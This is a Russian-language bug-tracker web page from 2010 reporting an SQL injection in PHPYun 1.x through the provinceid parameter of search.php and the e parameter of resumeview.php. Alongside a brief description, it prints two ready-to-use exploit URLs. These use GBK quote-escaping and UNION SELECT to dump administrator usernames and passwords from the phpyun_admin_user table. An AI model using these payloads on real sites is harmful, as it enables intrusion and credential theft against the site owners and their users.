| Меню |
|
 |
| Категории |
|
 |
| Статистика |
Онлайн всего: 1 Гостей: 1 Пользователей: 0 |
 |
| Вход |
|
 |
|
 |  |  |
| Главная » 2010 » Октябрь » 13 » SQL-инъекция в PHPYun
10:05 SQL-инъекция в PHPYun |
Программа: PHPYun 1.x
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "provinceid" сценарием search.php (когда "cityid" установлен) и в параметре "e" parameter to resumeview.php (when "uid" is set). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
www.abc.com/search.php?keyword=&provinceid=%df\&cityid=%20union%20select%201,2, concat(0x40,0x23,username,0x7e,password,0x23,0x40),4,5,6,7,8,9,0,11,12%20 from%20phpyun_admin_user--%20-&mySearchCityName= &mySearchCity=&search=%CB%D1%CB%F7
www.abc.com/resumeview.php?uid= union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(0x40,0x23,username,0x7e,password,0x23,0x40),17 from phpyun_admin_user-- sd&e=%df\
|
|
Категория: BugTrack |
Просмотров: 611 |
Добавил: sepos
| Рейтинг: 5.0/1 |
Добавлять комментарии могут только зарегистрированные пользователи. [ Регистрация | Вход ]
| |
 |  |  |
|
| Поиск |
|
 |
| Календарь |
|
 |
| Архив |
|
 |
|